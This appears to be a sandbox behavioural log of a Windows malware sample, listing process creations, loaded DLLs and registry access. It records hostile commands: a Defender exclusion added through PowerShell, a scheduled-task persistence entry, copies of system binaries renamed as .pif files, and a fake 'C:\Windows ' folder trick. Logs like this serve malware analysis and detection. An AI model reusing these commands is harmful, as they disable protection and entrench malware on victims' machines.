Source: unknown Process created: C:\Users\user\Desktop\C6dAUcOA6M.exe "C:\Users\user\Desktop\C6dAUcOA6M.exe"
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: unknown Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: url.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ???????.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: C6dAUcOA6M.exe Static file information: File size 1226752 > 1048576
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: aymtmquJ.pif, 0000000B.00000003.1450910858.000000001BE00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
